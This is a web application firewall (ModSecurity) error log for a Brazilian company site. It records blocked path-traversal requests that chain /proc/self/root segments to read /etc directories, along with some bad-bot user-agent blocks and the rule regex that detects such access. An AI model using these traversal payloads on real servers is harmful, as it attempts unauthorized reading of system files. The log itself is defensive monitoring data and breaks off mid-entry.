[Wed Mar 18 05:06:31.022552 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.241.31:33514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpdB8df6f5d65gmYZSZ2QAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:06:33.612886 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:33528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpdCeyqAr6etmhZHNqC9AAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:06:40.263409 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:48632] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpdENY0UrI5A3LftIxfCAAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:07:14.184532 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.241.31:33536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpdMuw_le52K8_3pV2pogAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:07:19.084679 2026] [:error] [pid 15051:tid 140411683178240] [client 74.7.241.31:54838] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpdNSmAPhZkrhU8w4k2rgAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:07:19.091858 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.244.43:40128] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpdNtY0UrI5A3LftIxfJQAAAYQ"]
[Wed Mar 18 05:07:21.395159 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.228.61:41222] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpdOAkwaGbbGflqUZDakgAAANA"]
[Wed Mar 18 05:07:33.815138 2026] [:error] [pid 31803:tid 140411641214720] [client 216.73.216.191:58606] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpdReyqAr6etmhZHNqDFQAAAEw"]
[Wed Mar 18 05:07:51.004541 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.241.31:36982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpdV-w_le52K8_3pV2pxwAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:07:54.324849 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.241.31:39184] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpdWkzinOy1jxa1j4fcEAAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:08:15.768553 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:39186] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpdb-oXxyEfFpUF8f81lQAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:08:31.300717 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.241.31:45030] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpdfymAPhZkrhU8w4k21wAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:10:22.624988 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.241.31:39230] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpd7sdf6f5d65gmYZSahwAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:10:52.823102 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.241.31:40772] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpeDNY0UrI5A3LftIxfewAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Wed Mar 18 05:11:25.703658 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.241.31:47800] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpeLcdf6f5d65gmYZSatwAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:12:22.094933 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.228.61:54042] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpeZimAPhZkrhU8w4k3JgAAAIo"]
[Wed Mar 18 05:12:23.741845 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.244.43:33466] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpeZ-yqAr6etmhZHNqDiQAAAFM"]
[Wed Mar 18 05:12:24.777973 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.241.31:54746] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpeaPu8EFLIOrSqIpvP4QAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:13:34.616530 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.241.31:47440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abperimAPhZkrhU8w4k3eAAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:13:50.391102 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.241.31:53730] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpevkzinOy1jxa1j4fcigAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:14:05.943627 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:33420] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpezda6ubjKNq_cu4ZfpAAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:15:54.815756 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.241.31:32864] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpfOuyqAr6etmhZHNqEZAAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:16:19.044017 2026] [:error] [pid 29882:tid 140411582465792] [client 74.7.243.128:43036] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpfU0zinOy1jxa1j4fc1AAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:16:20.030451 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.241.31:39946] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpfVOyqAr6etmhZHNqEgAAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:16:29.064890 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:53474] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 